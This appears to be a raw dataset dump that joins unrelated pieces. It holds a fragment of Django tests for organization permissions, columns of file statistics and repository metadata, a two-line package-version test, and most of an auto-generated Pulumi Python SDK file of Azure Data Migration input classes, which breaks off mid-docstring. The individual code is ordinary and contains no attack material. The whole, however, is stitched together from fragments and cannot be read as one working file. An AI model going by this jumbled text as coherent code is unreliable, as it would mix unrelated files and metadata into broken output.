attr = permissions.org_permissions(joe, 'http://foobar.com/')
self.assertEqual(attr['has_perm'], True)
self.assertEqual(attr['is_admin'], False)
attr = permissions.org_permissions(sam, 'http://foobar.com/')
self.assertEqual(attr['has_perm'], False)
self.assertEqual(attr['is_admin'], False)
attr = permissions.org_permissions(joe, 'http://test-app.molo.site/')
self.assertEqual(attr['has_perm'], False)
self.assertEqual(attr['is_admin'], False)
attr = permissions.org_permissions(sam, 'http://test-app.molo.site/')
self.assertEqual(attr['has_perm'], True)
self.assertEqual(attr['is_admin'], False)
# tom is an admin user in other org
tom = User.objects.create_user('tom', 'tom@email.com', '1234')
OrganizationUserRelation.objects.create(
user=tom, organization=other_org, is_admin=True)
attr = permissions.org_permissions(tom, 'http://foobar.com/')
self.assertEqual(attr['has_perm'], False)
self.assertEqual(attr['is_admin'], False)
attr = permissions.org_permissions(tom, 'http://test-app.molo.site/')
self.assertEqual(attr['has_perm'], True)
self.assertEqual(attr['is_admin'], True)
attr = permissions.org_permissions(sam, 'http://test-app.molo.site/')
self.assertEqual(attr['has_perm'], True)
self.assertEqual(attr['is_admin'], False)
def test_access_using_generic_domain(self):
user = User.objects.create_user('joe', 'joe@email.com', '1234')
org = Organization.objects.create(name='Test', slug='test')
OrganizationUserRelation.objects.create(
user=user, organization=org, is_admin=True)
self.client.login(username='joe', password='1234')
controller = DockerController.objects.create(
name='my test app', organization=org,
owner=self.user, slug='test-app')
attr = permissions.org_permissions(
user, 'http://%s.seed.p16n.org/admin/' % controller.app_id)
self.assertEqual(attr['has_perm'], True)
self.assertEqual(attr['is_admin'], True)
| 42.903766
| 78
| 0.646577
| 1,218
| 10,254
| 5.311166
| 0.101806
| 0.078374
| 0.102798
| 0.080693
| 0.820683
| 0.775854
| 0.742
| 0.72175
| 0.710311
| 0.700727
| 0
| 0.016727
| 0.212893
| 10,254
| 238
| 79
| 43.084034
| 0.784785
| 0.028769
| 0
| 0.657609
| 0
| 0
| 0.17968
| 0.024319
| 0
| 0
| 0
| 0
| 0.228261
| 1
| 0.070652
| false
| 0.076087
| 0.032609
| 0
| 0.11413
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 7
|
98d26459d39efcaa7ff3bba07e564e9b9b0b8ad3
| 179
|
py
|
Python
|
tests/test_version.py
|
LucaCappelletti94/setup_python_package
|
61b5f3cff1ed3181f932293c63c4fcb71cbe0062
|
[
"MIT"
] | 5
|
2019-09-17T14:46:35.000Z
|
2020-06-06T08:17:02.000Z
|
tests/test_version.py
|
LucaCappelletti94/setup_python_package
|
61b5f3cff1ed3181f932293c63c4fcb71cbe0062
|
[
"MIT"
] | 2
|
2020-12-18T01:47:55.000Z
|
2020-12-25T10:08:30.000Z
|
tests/test_version.py
|
LucaCappelletti94/setup_python_package
|
61b5f3cff1ed3181f932293c63c4fcb71cbe0062
|
[
"MIT"
] | null | null | null |
from validate_version_code import validate_version_code
from setup_python_package.__version__ import __version__
def test_version():
assert validate_version_code(__version__)
| 35.8
| 56
| 0.877095
| 23
| 179
| 5.913043
| 0.478261
| 0.330882
| 0.419118
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.089385
| 179
| 5
| 57
| 35.8
| 0.834356
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.25
| 1
| 0.25
| true
| 0
| 0.5
| 0
| 0.75
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
c707c2b49ca849d5bf51ee322ad464c1caadb9f1
| 138,917
|
py
|
Python
|
sdk/python/pulumi_azure_native/datamigration/v20180419/_inputs.py
|
pulumi-bot/pulumi-azure-native
|
f7b9490b5211544318e455e5cceafe47b628e12c
|
[
"Apache-2.0"
] | 31
|
2020-09-21T09:41:01.000Z
|
2021-02-26T13:21:59.000Z
|
sdk/python/pulumi_azure_native/datamigration/v20180419/_inputs.py
|
pulumi-bot/pulumi-azure-native
|
f7b9490b5211544318e455e5cceafe47b628e12c
|
[
"Apache-2.0"
] | 231
|
2020-09-21T09:38:45.000Z
|
2021-03-01T11:16:03.000Z
|
sdk/python/pulumi_azure_native/datamigration/v20180419/_inputs.py
|
pulumi-bot/pulumi-azure-native
|
f7b9490b5211544318e455e5cceafe47b628e12c
|
[
"Apache-2.0"
] | 4
|
2020-09-29T14:14:59.000Z
|
2021-02-10T20:38:16.000Z
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union
from ... import _utilities, _tables
from ._enums import *
__all__ = [
'AzureActiveDirectoryAppArgs',
'BlobShareArgs',
'ConnectToSourcePostgreSqlSyncTaskInputArgs',
'ConnectToSourcePostgreSqlSyncTaskPropertiesArgs',
'ConnectToSourceSqlServerSyncTaskPropertiesArgs',
'ConnectToSourceSqlServerTaskInputArgs',
'ConnectToSourceSqlServerTaskPropertiesArgs',
'ConnectToTargetAzureDbForMySqlTaskInputArgs',
'ConnectToTargetAzureDbForMySqlTaskPropertiesArgs',
'ConnectToTargetAzureDbForPostgreSqlSyncTaskInputArgs',
'ConnectToTargetAzureDbForPostgreSqlSyncTaskPropertiesArgs',
'ConnectToTargetSqlDbTaskInputArgs',
'ConnectToTargetSqlDbTaskPropertiesArgs',
'ConnectToTargetSqlMISyncTaskInputArgs',
'ConnectToTargetSqlMISyncTaskPropertiesArgs',
'ConnectToTargetSqlMITaskInputArgs',
'ConnectToTargetSqlMITaskPropertiesArgs',
'ConnectToTargetSqlSqlDbSyncTaskInputArgs',
'ConnectToTargetSqlSqlDbSyncTaskPropertiesArgs',
'DatabaseInfoArgs',
'FileShareArgs',
'GetTdeCertificatesSqlTaskInputArgs',
'GetTdeCertificatesSqlTaskPropertiesArgs',
'GetUserTablesSqlSyncTaskInputArgs',
'GetUserTablesSqlSyncTaskPropertiesArgs',
'GetUserTablesSqlTaskInputArgs',
'GetUserTablesSqlTaskPropertiesArgs',
'MiSqlConnectionInfoArgs',
'MigrateMySqlAzureDbForMySqlSyncDatabaseInputArgs',
'MigrateMySqlAzureDbForMySqlSyncTaskInputArgs',
'MigrateMySqlAzureDbForMySqlSyncTaskPropertiesArgs',
'MigratePostgreSqlAzureDbForPostgreSqlSyncDatabaseInputArgs',
'MigratePostgreSqlAzureDbForPostgreSqlSyncTaskInputArgs',
'MigratePostgreSqlAzureDbForPostgreSqlSyncTaskPropertiesArgs',
'MigrateSqlServerSqlDbDatabaseInputArgs',
'MigrateSqlServerSqlDbSyncDatabaseInputArgs',
'MigrateSqlServerSqlDbSyncTaskInputArgs',
'MigrateSqlServerSqlDbSyncTaskPropertiesArgs',
'MigrateSqlServerSqlDbTaskInputArgs',
'MigrateSqlServerSqlDbTaskPropertiesArgs',
'MigrateSqlServerSqlMIDatabaseInputArgs',
'MigrateSqlServerSqlMISyncTaskInputArgs',
'MigrateSqlServerSqlMISyncTaskPropertiesArgs',
'MigrateSqlServerSqlMITaskInputArgs',
'MigrateSqlServerSqlMITaskPropertiesArgs',
'MigrationValidationOptionsArgs',
'MySqlConnectionInfoArgs',
'PostgreSqlConnectionInfoArgs',
'SelectedCertificateInputArgs',
'ServiceSkuArgs',
'SqlConnectionInfoArgs',
'ValidateMigrationInputSqlServerSqlDbSyncTaskPropertiesArgs',
'ValidateMigrationInputSqlServerSqlMISyncTaskInputArgs',
'ValidateMigrationInputSqlServerSqlMISyncTaskPropertiesArgs',
'ValidateMigrationInputSqlServerSqlMITaskInputArgs',
'ValidateMigrationInputSqlServerSqlMITaskPropertiesArgs',
'ValidateSyncMigrationInputSqlServerTaskInputArgs',
]
@pulumi.input_type
class AzureActiveDirectoryAppArgs:
def __init__(__self__, *,
app_key: pulumi.Input[str],
application_id: pulumi.Input[str],
tenant_id: pulumi.Input[str]):
"""
Azure Active Directory Application
:param pulumi.Input[str] app_key: Key used to authenticate to the Azure Active Directory Application
:param pulumi.Input[str] application_id: Application ID of the Azure Active Directory Application
:param pulumi.Input[str] tenant_id: Tenant id of the customer
"""
pulumi.set(__self__, "app_key", app_key)
pulumi.set(__self__, "application_id", application_id)
pulumi.set(__self__, "tenant_id", tenant_id)
@property
@pulumi.getter(name="appKey")
def app_key(self) -> pulumi.Input[str]:
"""
Key used to authenticate to the Azure Active Directory Application
"""
return pulumi.get(self, "app_key")
@app_key.setter
def app_key(self, value: pulumi.Input[str]):
pulumi.set(self, "app_key", value)
@property
@pulumi.getter(name="applicationId")
def application_id(self) -> pulumi.Input[str]:
"""
Application ID of the Azure Active Directory Application
"""
return pulumi.get(self, "application_id")
@application_id.setter
def application_id(self, value: pulumi.Input[str]):
pulumi.set(self, "application_id", value)
@property
@pulumi.getter(name="tenantId")
def tenant_id(self) -> pulumi.Input[str]:
"""
Tenant id of the customer
"""
return pulumi.get(self, "tenant_id")
@tenant_id.setter
def tenant_id(self, value: pulumi.Input[str]):
pulumi.set(self, "tenant_id", value)
@pulumi.input_type
class BlobShareArgs:
def __init__(__self__, *,
sas_uri: pulumi.Input[str]):
"""
Blob container storage information.
:param pulumi.Input[str] sas_uri: SAS URI of Azure Storage Account Container.
"""
pulumi.set(__self__, "sas_uri", sas_uri)
@property
@pulumi.getter(name="sasUri")
def sas_uri(self) -> pulumi.Input[str]:
"""
SAS URI of Azure Storage Account Container.
"""
return pulumi.get(self, "sas_uri")
@sas_uri.setter
def sas_uri(self, value: pulumi.Input[str]):
pulumi.set(self, "sas_uri", value)
@pulumi.input_type
class ConnectToSourcePostgreSqlSyncTaskInputArgs:
def __init__(__self__, *,
source_connection_info: pulumi.Input['PostgreSqlConnectionInfoArgs']):
"""
Input for the task that validates connection to PostgreSQL and source server requirements
:param pulumi.Input['PostgreSqlConnectionInfoArgs'] source_connection_info: Connection information for source PostgreSQL server
"""
pulumi.set(__self__, "source_connection_info", source_connection_info)
@property
@pulumi.getter(name="sourceConnectionInfo")
def source_connection_info(self) -> pulumi.Input['PostgreSqlConnectionInfoArgs']:
"""
Connection information for source PostgreSQL server
"""
return pulumi.get(self, "source_connection_info")
@source_connection_info.setter
def source_connection_info(self, value: pulumi.Input['PostgreSqlConnectionInfoArgs']):
pulumi.set(self, "source_connection_info", value)
@pulumi.input_type
class ConnectToSourcePostgreSqlSyncTaskPropertiesArgs:
def __init__(__self__, *,
task_type: pulumi.Input[str],
input: Optional[pulumi.Input['ConnectToSourcePostgreSqlSyncTaskInputArgs']] = None):
"""
Properties for the task that validates connection to PostgreSQL server and source server requirements for online migration
:param pulumi.Input[str] task_type: Task type.
Expected value is 'ConnectToSource.PostgreSql.Sync'.
:param pulumi.Input['ConnectToSourcePostgreSqlSyncTaskInputArgs'] input: Task input
"""
pulumi.set(__self__, "task_type", 'ConnectToSource.PostgreSql.Sync')
if input is not None:
pulumi.set(__self__, "input", input)
@property
@pulumi.getter(name="taskType")
def task_type(self) -> pulumi.Input[str]:
"""
Task type.
Expected value is 'ConnectToSource.PostgreSql.Sync'.
"""
return pulumi.get(self, "task_type")
@task_type.setter
def task_type(self, value: pulumi.Input[str]):
pulumi.set(self, "task_type", value)
@property
@pulumi.getter
def input(self) -> Optional[pulumi.Input['ConnectToSourcePostgreSqlSyncTaskInputArgs']]:
"""
Task input
"""
return pulumi.get(self, "input")
@input.setter
def input(self, value: Optional[pulumi.Input['ConnectToSourcePostgreSqlSyncTaskInputArgs']]):
pulumi.set(self, "input", value)
@pulumi.input_type
class ConnectToSourceSqlServerSyncTaskPropertiesArgs:
def __init__(__self__, *,
task_type: pulumi.Input[str],
input: Optional[pulumi.Input['ConnectToSourceSqlServerTaskInputArgs']] = None):
"""
Properties for the task that validates connection to SQL Server and source server requirements for online migration
:param pulumi.Input[str] task_type: Task type.
Expected value is 'ConnectToSource.SqlServer.Sync'.
:param pulumi.Input['ConnectToSourceSqlServerTaskInputArgs'] input: Task input
"""
pulumi.set(__self__, "task_type", 'ConnectToSource.SqlServer.Sync')
if input is not None:
pulumi.set(__self__, "input", input)
@property
@pulumi.getter(name="taskType")
def task_type(self) -> pulumi.Input[str]:
"""
Task type.
Expected value is 'ConnectToSource.SqlServer.Sync'.
"""
return pulumi.get(self, "task_type")
@task_type.setter
def task_type(self, value: pulumi.Input[str]):
pulumi.set(self, "task_type", value)
@property
@pulumi.getter
def input(self) -> Optional[pulumi.Input['ConnectToSourceSqlServerTaskInputArgs']]:
"""
Task input
"""
return pulumi.get(self, "input")
@input.setter
def input(self, value: Optional[pulumi.Input['ConnectToSourceSqlServerTaskInputArgs']]):
pulumi.set(self, "input", value)
@pulumi.input_type
class ConnectToSourceSqlServerTaskInputArgs:
def __init__(__self__, *,
source_connection_info: pulumi.Input['SqlConnectionInfoArgs'],
check_permissions_group: Optional[pulumi.Input[Union[str, 'ServerLevelPermissionsGroup']]] = None,
collect_agent_jobs: Optional[pulumi.Input[bool]] = None,
collect_logins: Optional[pulumi.Input[bool]] = None):
"""
Input for the task that validates connection to SQL Server and also validates source server requirements
:param pulumi.Input['SqlConnectionInfoArgs'] source_connection_info: Connection information for Source SQL Server
:param pulumi.Input[Union[str, 'ServerLevelPermissionsGroup']] check_permissions_group: Permission group for validations
:param pulumi.Input[bool] collect_agent_jobs: Flag for whether to collect agent jobs from source server.
:param pulumi.Input[bool] collect_logins: Flag for whether to collect logins from source server.
"""
pulumi.set(__self__, "source_connection_info", source_connection_info)
if check_permissions_group is not None:
pulumi.set(__self__, "check_permissions_group", check_permissions_group)
if collect_agent_jobs is None:
collect_agent_jobs = False
if collect_agent_jobs is not None:
pulumi.set(__self__, "collect_agent_jobs", collect_agent_jobs)
if collect_logins is None:
collect_logins = False
if collect_logins is not None:
pulumi.set(__self__, "collect_logins", collect_logins)
@property
@pulumi.getter(name="sourceConnectionInfo")
def source_connection_info(self) -> pulumi.Input['SqlConnectionInfoArgs']:
"""
Connection information for Source SQL Server
"""
return pulumi.get(self, "source_connection_info")
@source_connection_info.setter
def source_connection_info(self, value: pulumi.Input['SqlConnectionInfoArgs']):
pulumi.set(self, "source_connection_info", value)
@property
@pulumi.getter(name="checkPermissionsGroup")
def check_permissions_group(self) -> Optional[pulumi.Input[Union[str, 'ServerLevelPermissionsGroup']]]:
"""
Permission group for validations
"""
return pulumi.get(self, "check_permissions_group")
@check_permissions_group.setter
def check_permissions_group(self, value: Optional[pulumi.Input[Union[str, 'ServerLevelPermissionsGroup']]]):
pulumi.set(self, "check_permissions_group", value)
@property
@pulumi.getter(name="collectAgentJobs")
def collect_agent_jobs(self) -> Optional[pulumi.Input[bool]]:
"""
Flag for whether to collect agent jobs from source server.
"""
return pulumi.get(self, "collect_agent_jobs")
@collect_agent_jobs.setter
def collect_agent_jobs(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "collect_agent_jobs", value)
@property
@pulumi.getter(name="collectLogins")
def collect_logins(self) -> Optional[pulumi.Input[bool]]:
"""
Flag for whether to collect logins from source server.
"""
return pulumi.get(self, "collect_logins")
@collect_logins.setter
def collect_logins(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "collect_logins", value)
@pulumi.input_type
class ConnectToSourceSqlServerTaskPropertiesArgs:
def __init__(__self__, *,
task_type: pulumi.Input[str],
input: Optional[pulumi.Input['ConnectToSourceSqlServerTaskInputArgs']] = None):
"""
Properties for the task that validates connection to SQL Server and also validates source server requirements
:param pulumi.Input[str] task_type: Task type.
Expected value is 'ConnectToSource.SqlServer'.
:param pulumi.Input['ConnectToSourceSqlServerTaskInputArgs'] input: Task input
"""
pulumi.set(__self__, "task_type", 'ConnectToSource.SqlServer')
if input is not None:
pulumi.set(__self__, "input", input)
@property
@pulumi.getter(name="taskType")
def task_type(self) -> pulumi.Input[str]:
"""
Task type.
Expected value is 'ConnectToSource.SqlServer'.
"""
return pulumi.get(self, "task_type")
@task_type.setter
def task_type(self, value: pulumi.Input[str]):
pulumi.set(self, "task_type", value)
@property
@pulumi.getter
def input(self) -> Optional[pulumi.Input['ConnectToSourceSqlServerTaskInputArgs']]:
"""
Task input
"""
return pulumi.get(self, "input")
@input.setter
def input(self, value: Optional[pulumi.Input['ConnectToSourceSqlServerTaskInputArgs']]):
pulumi.set(self, "input", value)
@pulumi.input_type
class ConnectToTargetAzureDbForMySqlTaskInputArgs:
def __init__(__self__, *,
source_connection_info: pulumi.Input['MySqlConnectionInfoArgs'],
target_connection_info: pulumi.Input['MySqlConnectionInfoArgs']):
"""
Input for the task that validates connection to Azure Database for MySQL and target server requirements
:param pulumi.Input['MySqlConnectionInfoArgs'] source_connection_info: Connection information for source MySQL server
:param pulumi.Input['MySqlConnectionInfoArgs'] target_connection_info: Connection information for target Azure Database for MySQL server
"""
pulumi.set(__self__, "source_connection_info", source_connection_info)
pulumi.set(__self__, "target_connection_info", target_connection_info)
@property
@pulumi.getter(name="sourceConnectionInfo")
def source_connection_info(self) -> pulumi.Input['MySqlConnectionInfoArgs']:
"""
Connection information for source MySQL server
"""
return pulumi.get(self, "source_connection_info")
@source_connection_info.setter
def source_connection_info(self, value: pulumi.Input['MySqlConnectionInfoArgs']):
pulumi.set(self, "source_connection_info", value)
@property
@pulumi.getter(name="targetConnectionInfo")
def target_connection_info(self) -> pulumi.Input['MySqlConnectionInfoArgs']:
"""
Connection information for target Azure Database for MySQL server
"""
return pulumi.get(self, "target_connection_info")
@target_connection_info.setter
def target_connection_info(self, value: pulumi.Input['MySqlConnectionInfoArgs']):
pulumi.set(self, "target_connection_info", value)
@pulumi.input_type
class ConnectToTargetAzureDbForMySqlTaskPropertiesArgs:
def __init__(__self__, *,
task_type: pulumi.Input[str],
input: Optional[pulumi.Input['ConnectToTargetAzureDbForMySqlTaskInputArgs']] = None):
"""
Properties for the task that validates connection to Azure Database for MySQL and target server requirements
:param pulumi.Input[str] task_type: Task type.
Expected value is 'ConnectToTarget.AzureDbForMySql'.
:param pulumi.Input['ConnectToTargetAzureDbForMySqlTaskInputArgs'] input: Task input
"""
pulumi.set(__self__, "task_type", 'ConnectToTarget.AzureDbForMySql')
if input is not None:
pulumi.set(__self__, "input", input)
@property
@pulumi.getter(name="taskType")
def task_type(self) -> pulumi.Input[str]:
"""
Task type.
Expected value is 'ConnectToTarget.AzureDbForMySql'.
"""
return pulumi.get(self, "task_type")
@task_type.setter
def task_type(self, value: pulumi.Input[str]):
pulumi.set(self, "task_type", value)
@property
@pulumi.getter
def input(self) -> Optional[pulumi.Input['ConnectToTargetAzureDbForMySqlTaskInputArgs']]:
"""
Task input
"""
return pulumi.get(self, "input")
@input.setter
def input(self, value: Optional[pulumi.Input['ConnectToTargetAzureDbForMySqlTaskInputArgs']]):
pulumi.set(self, "input", value)
@pulumi.input_type
class ConnectToTargetAzureDbForPostgreSqlSyncTaskInputArgs:
def __init__(__self__, *,
source_connection_info: pulumi.Input['PostgreSqlConnectionInfoArgs'],
target_connection_info: pulumi.Input['PostgreSqlConnectionInfoArgs']):
"""
Input for the task that validates connection to Azure Database for PostgreSQL and target server requirements
:param pulumi.Input['PostgreSqlConnectionInfoArgs'] source_connection_info: Connection information for source PostgreSQL server
:param pulumi.Input['PostgreSqlConnectionInfoArgs'] target_connection_info: Connection information for target Azure Database for PostgreSQL server
"""
pulumi.set(__self__, "source_connection_info", source_connection_info)
pulumi.set(__self__, "target_connection_info", target_connection_info)
@property
@pulumi.getter(name="sourceConnectionInfo")
def source_connection_info(self) -> pulumi.Input['PostgreSqlConnectionInfoArgs']:
"""
Connection information for source PostgreSQL server
"""
return pulumi.get(self, "source_connection_info")
@source_connection_info.setter
def source_connection_info(self, value: pulumi.Input['PostgreSqlConnectionInfoArgs']):
pulumi.set(self, "source_connection_info", value)
@property
@pulumi.getter(name="targetConnectionInfo")
def target_connection_info(self) -> pulumi.Input['PostgreSqlConnectionInfoArgs']:
"""
Connection information for target Azure Database for PostgreSQL server
"""
return pulumi.get(self, "target_connection_info")
@target_connection_info.setter
def target_connection_info(self, value: pulumi.Input['PostgreSqlConnectionInfoArgs']):
pulumi.set(self, "target_connection_info", value)
@pulumi.input_type
class ConnectToTargetAzureDbForPostgreSqlSyncTaskPropertiesArgs:
def __init__(__self__, *,
task_type: pulumi.Input[str],
input: Optional[pulumi.Input['ConnectToTargetAzureDbForPostgreSqlSyncTaskInputArgs']] = None):
"""
Properties for the task that validates connection to Azure Database For PostgreSQL server and target server requirements for online migration
:param pulumi.Input[str] task_type: Task type.
Expected value is 'ConnectToTarget.AzureDbForPostgreSql.Sync'.
:param pulumi.Input['ConnectToTargetAzureDbForPostgreSqlSyncTaskInputArgs'] input: Task input
"""
pulumi.set(__self__, "task_type", 'ConnectToTarget.AzureDbForPostgreSql.Sync')
if input is not None:
pulumi.set(__self__, "input", input)
@property
@pulumi.getter(name="taskType")
def task_type(self) -> pulumi.Input[str]:
"""
Task type.
Expected value is 'ConnectToTarget.AzureDbForPostgreSql.Sync'.
"""
return pulumi.get(self, "task_type")
@task_type.setter
def task_type(self, value: pulumi.Input[str]):
pulumi.set(self, "task_type", value)
@property
@pulumi.getter
def input(self) -> Optional[pulumi.Input['ConnectToTargetAzureDbForPostgreSqlSyncTaskInputArgs']]:
"""
Task input
"""
return pulumi.get(self, "input")
@input.setter
def input(self, value: Optional[pulumi.Input['ConnectToTargetAzureDbForPostgreSqlSyncTaskInputArgs']]):
pulumi.set(self, "input", value)
@pulumi.input_type
class ConnectToTargetSqlDbTaskInputArgs:
def __init__(__self__, *,
target_connection_info: pulumi.Input['SqlConnectionInfoArgs']):
"""
Input for the task that validates connection to SQL DB and target server requirements
:param pulumi.Input['SqlConnectionInfoArgs'] target_connection_info: Connection information for target SQL DB
"""
pulumi.set(__self__, "target_connection_info", target_connection_info)
@property
@pulumi.getter(name="targetConnectionInfo")
def target_connection_info(self) -> pulumi.Input['SqlConnectionInfoArgs']:
"""
Connection information for target SQL DB
"""
return pulumi.get(self, "target_connection_info")
@target_connection_info.setter
def target_connection_info(self, value: pulumi.Input['SqlConnectionInfoArgs']):
pulumi.set(self, "target_connection_info", value)
@pulumi.input_type
class ConnectToTargetSqlDbTaskPropertiesArgs:
def __init__(__self__, *,
task_type: pulumi.Input[str],
input: Optional[pulumi.Input['ConnectToTargetSqlDbTaskInputArgs']] = None):
"""
Properties for the task that validates connection to SQL DB and target server requirements
:param pulumi.Input[str] task_type: Task type.
Expected value is 'ConnectToTarget.SqlDb'.
:param pulumi.Input['ConnectToTargetSqlDbTaskInputArgs'] input: Task input
"""
pulumi.set(__self__, "task_type", 'ConnectToTarget.SqlDb')
if input is not None:
pulumi.set(__self__, "input", input)
@property
@pulumi.getter(name="taskType")
def task_type(self) -> pulumi.Input[str]:
"""
Task type.
Expected value is 'ConnectToTarget.SqlDb'.
"""
return pulumi.get(self, "task_type")
@task_type.setter
def task_type(self, value: pulumi.Input[str]):
pulumi.set(self, "task_type", value)
@property
@pulumi.getter
def input(self) -> Optional[pulumi.Input['ConnectToTargetSqlDbTaskInputArgs']]:
"""
Task input
"""
return pulumi.get(self, "input")
@input.setter
def input(self, value: Optional[pulumi.Input['ConnectToTargetSqlDbTaskInputArgs']]):
pulumi.set(self, "input", value)
@pulumi.input_type
class ConnectToTargetSqlMISyncTaskInputArgs:
def __init__(__self__, *,
azure_app: pulumi.Input['AzureActiveDirectoryAppArgs'],
target_connection_info: pulumi.Input['MiSqlConnectionInfoArgs']):
"""
Input for the task that validates connection to Azure SQL Database Managed Instance online scenario.
:param pulumi.Input['AzureActiveDirectoryAppArgs'] azure_app: Azure Active Directory Application the DMS instance will use to connect to the target instance of Azure SQL Database Managed Instance and the Azure Storage Account
:param pulumi.Input['MiSqlConnectionInfoArgs'] target_connection_info: Connection information for Azure SQL Database Managed Instance
"""
pulumi.set(__self__, "azure_app", azure_app)
pulumi.set(__self__, "target_connection_info", target_connection_info)
@property
@pulumi.getter(name="azureApp")
def azure_app(self) -> pulumi.Input['AzureActiveDirectoryAppArgs']:
"""
Azure Active Directory Application the DMS instance will use to connect to the target instance of Azure SQL Database Managed Instance and the Azure Storage Account
"""
return pulumi.get(self, "azure_app")
@azure_app.setter
def azure_app(self, value: pulumi.Input['AzureActiveDirectoryAppArgs']):
pulumi.set(self, "azure_app", value)
@property
@pulumi.getter(name="targetConnectionInfo")
def target_connection_info(self) -> pulumi.Input['MiSqlConnectionInfoArgs']:
"""
Connection information for Azure SQL Database Managed Instance
"""
return pulumi.get(self, "target_connection_info")
@target_connection_info.setter
def target_connection_info(self, value: pulumi.Input['MiSqlConnectionInfoArgs']):
pulumi.set(self, "target_connection_info", value)
@pulumi.input_type
class ConnectToTargetSqlMISyncTaskPropertiesArgs:
def __init__(__self__, *,
task_type: pulumi.Input[str],
input: Optional[pulumi.Input['ConnectToTargetSqlMISyncTaskInputArgs']] = None):
"""
Properties for the task that validates connection to Azure SQL Database Managed Instance
:param pulumi.Input[str] task_type: Task type.
Expected value is 'ConnectToTarget.AzureSqlDbMI.Sync.LRS'.
:param pulumi.Input['ConnectToTargetSqlMISyncTaskInputArgs'] input: Task input
"""
pulumi.set(__self__, "task_type", 'ConnectToTarget.AzureSqlDbMI.Sync.LRS')
if input is not None:
pulumi.set(__self__, "input", input)
@property
@pulumi.getter(name="taskType")
def task_type(self) -> pulumi.Input[str]:
"""
Task type.
Expected value is 'ConnectToTarget.AzureSqlDbMI.Sync.LRS'.
"""
return pulumi.get(self, "task_type")
@task_type.setter
def task_type(self, value: pulumi.Input[str]):
pulumi.set(self, "task_type", value)
@property
@pulumi.getter
def input(self) -> Optional[pulumi.Input['ConnectToTargetSqlMISyncTaskInputArgs']]:
"""
Task input
"""
return pulumi.get(self, "input")
@input.setter
def input(self, value: Optional[pulumi.Input['ConnectToTargetSqlMISyncTaskInputArgs']]):
pulumi.set(self, "input", value)
@pulumi.input_type
class ConnectToTargetSqlMITaskInputArgs:
def __init__(__self__, *,
target_connection_info: pulumi.Input['SqlConnectionInfoArgs']):
"""
Input for the task that validates connection to Azure SQL Database Managed Instance.
:param pulumi.Input['SqlConnectionInfoArgs'] target_connection_info: Connection information for target SQL Server
"""
pulumi.set(__self__, "target_connection_info", target_connection_info)
@property
@pulumi.getter(name="targetConnectionInfo")
def target_connection_info(self) -> pulumi.Input['SqlConnectionInfoArgs']:
"""
Connection information for target SQL Server
"""
return pulumi.get(self, "target_connection_info")
@target_connection_info.setter
def target_connection_info(self, value: pulumi.Input['SqlConnectionInfoArgs']):
pulumi.set(self, "target_connection_info", value)
@pulumi.input_type
class ConnectToTargetSqlMITaskPropertiesArgs:
def __init__(__self__, *,
task_type: pulumi.Input[str],
input: Optional[pulumi.Input['ConnectToTargetSqlMITaskInputArgs']] = None):
"""
Properties for the task that validates connection to Azure SQL Database Managed Instance
:param pulumi.Input[str] task_type: Task type.
Expected value is 'ConnectToTarget.AzureSqlDbMI'.
:param pulumi.Input['ConnectToTargetSqlMITaskInputArgs'] input: Task input
"""
pulumi.set(__self__, "task_type", 'ConnectToTarget.AzureSqlDbMI')
if input is not None:
pulumi.set(__self__, "input", input)
@property
@pulumi.getter(name="taskType")
def task_type(self) -> pulumi.Input[str]:
"""
Task type.
Expected value is 'ConnectToTarget.AzureSqlDbMI'.
"""
return pulumi.get(self, "task_type")
@task_type.setter
def task_type(self, value: pulumi.Input[str]):
pulumi.set(self, "task_type", value)
@property
@pulumi.getter
def input(self) -> Optional[pulumi.Input['ConnectToTargetSqlMITaskInputArgs']]:
"""
Task input
"""
return pulumi.get(self, "input")
@input.setter
def input(self, value: Optional[pulumi.Input['ConnectToTargetSqlMITaskInputArgs']]):
pulumi.set(self, "input", value)
@pulumi.input_type
class ConnectToTargetSqlSqlDbSyncTaskInputArgs:
def __init__(__self__, *,
source_connection_info: pulumi.Input['SqlConnectionInfoArgs'],
target_connection_info: pulumi.Input['SqlConnectionInfoArgs']):
"""
Input for the task that validates connection to Azure SQL DB and target server requirements
:param pulumi.Input['SqlConnectionInfoArgs'] source_connection_info: Connection information for source SQL Server
:param pulumi.Input['SqlConnectionInfoArgs'] target_connection_info: Connection information for target SQL DB
"""
pulumi.set(__self__, "source_connection_info", source_connection_info)
pulumi.set(__self__, "target_connection_info", target_connection_info)
@property
@pulumi.getter(name="sourceConnectionInfo")
def source_connection_info(self) -> pulumi.Input['SqlConnectionInfoArgs']:
"""
Connection information for source SQL Server
"""
return pulumi.get(self, "source_connection_info")
@source_connection_info.setter
def source_connection_info(self, value: pulumi.Input['SqlConnectionInfoArgs']):
pulumi.set(self, "source_connection_info", value)
@property
@pulumi.getter(name="targetConnectionInfo")
def target_connection_info(self) -> pulumi.Input['SqlConnectionInfoArgs']:
"""
Connection information for target SQL DB
"""
return pulumi.get(self, "target_connection_info")
@target_connection_info.setter
def target_connection_info(self, value: pulumi.Input['SqlConnectionInfoArgs']):
pulumi.set(self, "target_connection_info", value)
@pulumi.input_type
class ConnectToTargetSqlSqlDbSyncTaskPropertiesArgs:
def __init__(__self__, *,
task_type: pulumi.Input[str],
input: Optional[pulumi.Input['ConnectToTargetSqlSqlDbSyncTaskInputArgs']] = None):
"""
Properties for the task that validates connection to SQL DB and target server requirements for online migration
:param pulumi.Input[str] task_type: Task type.
Expected value is 'ConnectToTarget.SqlDb.Sync'.
